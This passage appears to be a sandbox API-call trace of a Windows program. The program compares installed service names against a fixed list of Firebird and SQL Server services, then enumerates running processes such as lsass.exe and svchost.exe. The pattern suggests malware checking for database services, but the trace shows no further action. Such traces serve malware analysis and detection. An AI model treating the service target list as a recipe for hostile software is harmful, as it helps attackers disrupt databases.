(lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0055.665] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0055.665] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0055.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0055.665] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0055.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0055.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0055.665] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0055.665] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0055.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0055.665] lstrlenW (lpString="CDPSvc") returned 6 [0055.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0055.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0055.665] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0055.665] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0055.665] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0055.665] lstrlenW (lpString="ClickToRunSvc") returned 13 [0055.665] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0055.665] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0055.665] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0055.666] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0055.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0055.666] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0055.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0055.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0055.666] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0055.666] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0055.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0055.666] lstrlenW (lpString="CryptSvc") returned 8 [0055.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0055.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0055.666] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0055.666] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0055.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0055.666] lstrlenW (lpString="DcomLaunch") returned 10 [0055.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.666] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0055.666] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0055.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0055.666] lstrlenW (lpString="DeviceAssociationService") returned 24 [0055.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0055.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0055.666] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0055.666] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0055.666] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0055.666] lstrlenW (lpString="Dhcp") returned 4 [0055.666] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0055.666] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0055.666] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0055.666] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0055.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0055.667] lstrlenW (lpString="Dnscache") returned 8 [0055.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0055.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0055.667] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0055.667] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0055.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0055.667] lstrlenW (lpString="DoSvc") returned 5 [0055.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0055.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0055.667] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0055.667] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0055.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0055.667] lstrlenW (lpString="DPS") returned 3 [0055.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0055.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0055.667] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0055.667] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0055.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0055.667] lstrlenW (lpString="DusmSvc") returned 7 [0055.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0055.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0055.667] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0055.667] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0055.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0055.667] lstrlenW (lpString="EventLog") returned 8 [0055.667] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0055.667] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0055.667] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0055.667] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0055.667] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0055.668] lstrlenW (lpString="EventSystem") returned 11 [0055.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0055.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0055.668] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0055.668] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0055.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0055.668] lstrlenW (lpString="FontCache") returned 9 [0055.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0055.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0055.668] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0055.668] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0055.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0055.668] lstrlenW (lpString="gpsvc") returned 5 [0055.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0055.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0055.668] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0055.668] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0055.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0055.668] lstrlenW (lpString="iphlpsvc") returned 8 [0055.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.668] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0055.668] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0055.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0055.668] lstrlenW (lpString="KeyIso") returned 6 [0055.668] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0055.668] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0055.668] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0055.668] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0055.668] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0055.668] lstrlenW (lpString="LanmanServer") returned 12 [0055.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0055.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0055.669] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0055.669] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0055.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0055.669] lstrlenW (lpString="LanmanWorkstation") returned 17 [0055.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.669] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0055.669] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0055.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0055.669] lstrlenW (lpString="lfsvc") returned 5 [0055.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0055.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0055.669] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0055.669] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0055.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0055.669] lstrlenW (lpString="lmhosts") returned 7 [0055.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0055.669] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0055.669] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0055.669] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0055.669] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0055.669] lstrlenW (lpString="LSM") returned 3 [0055.669] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0055.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0055.670] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0055.670] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0055.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0055.670] lstrlenW (lpString="MpsSvc") returned 6 [0055.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0055.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0055.670] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0055.670] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0055.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0055.670] lstrlenW (lpString="NcbService") returned 10 [0055.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0055.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0055.670] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0055.670] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0055.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0055.670] lstrlenW (lpString="netprofm") returned 8 [0055.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0055.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0055.670] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0055.670] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0055.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0055.670] lstrlenW (lpString="NlaSvc") returned 6 [0055.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0055.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0055.670] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0055.670] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0055.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0055.670] lstrlenW (lpString="nsi") returned 3 [0055.670] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0055.670] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0055.670] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0055.670] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0055.670] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0055.670] lstrlenW (lpString="PcaSvc") returned 6 [0055.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0055.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0055.671] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0055.671] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0055.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0055.671] lstrlenW (lpString="PlugPlay") returned 8 [0055.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0055.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0055.671] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0055.671] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0055.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0055.671] lstrlenW (lpString="Power") returned 5 [0055.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0055.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0055.671] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0055.671] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0055.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0055.671] lstrlenW (lpString="ProfSvc") returned 7 [0055.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0055.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0055.671] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0055.671] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0055.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0055.671] lstrlenW (lpString="RpcEptMapper") returned 12 [0055.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.671] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0055.671] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0055.671] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0055.671] lstrlenW (lpString="RpcSs") returned 5 [0055.671] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0055.671] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0055.671] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0055.672] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0055.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0055.672] lstrlenW (lpString="SamSs") returned 5 [0055.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0055.672] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0055.672] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0055.672] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0055.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0055.672] lstrlenW (lpString="Schedule") returned 8 [0055.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0055.672] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0055.672] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0055.672] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0055.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0055.672] lstrlenW (lpString="SecurityHealthService") returned 21 [0055.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0055.672] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0055.672] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0055.672] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0055.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0055.672] lstrlenW (lpString="SENS") returned 4 [0055.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0055.672] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0055.672] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0055.672] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0055.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0055.672] lstrlenW (lpString="ShellHWDetection") returned 16 [0055.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.672] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.672] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0055.672] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0055.672] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0055.672] lstrlenW (lpString="Spooler") returned 7 [0055.672] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0055.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0055.673] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0055.673] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0055.673] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0055.673] lstrlenW (lpString="SSDPSRV") returned 7 [0055.673] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0055.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0055.673] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0055.673] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0055.673] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0055.673] lstrlenW (lpString="StateRepository") returned 15 [0055.673] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0055.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0055.673] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0055.673] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0055.673] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0055.673] lstrlenW (lpString="SysMain") returned 7 [0055.673] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0055.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0055.673] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0055.673] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0055.673] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0055.673] lstrlenW (lpString="SystemEventsBroker") returned 18 [0055.673] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0055.673] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0055.673] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0055.673] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0055.673] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x636198 | out: hHeap=0x5d0000) returned 1 [0055.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x334 [0055.677] Process32FirstW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.677] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.678] lstrlenW (lpString="System") returned 6 [0055.678] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.679] lstrlenW (lpString="smss.exe") returned 8 [0055.679] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.679] lstrlenW (lpString="csrss.exe") returned 9 [0055.679] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.680] lstrlenW (lpString="wininit.exe") returned 11 [0055.680] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.681] lstrlenW (lpString="csrss.exe") returned 9 [0055.681] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.681] lstrlenW (lpString="winlogon.exe") returned 12 [0055.681] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.682] lstrlenW (lpString="services.exe") returned 12 [0055.682] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.683] lstrlenW (lpString="lsass.exe") returned 9 [0055.683] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.684] lstrlenW (lpString="svchost.exe") returned 11 [0055.684] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0056.073] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0056.073] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0056.074] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0056.075] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.075] lstrlenW (lpString="svchost.exe") returned 11 [0056.075] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.076] lstrlenW (lpString="dwm.exe") returned 7 [0056.076] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, 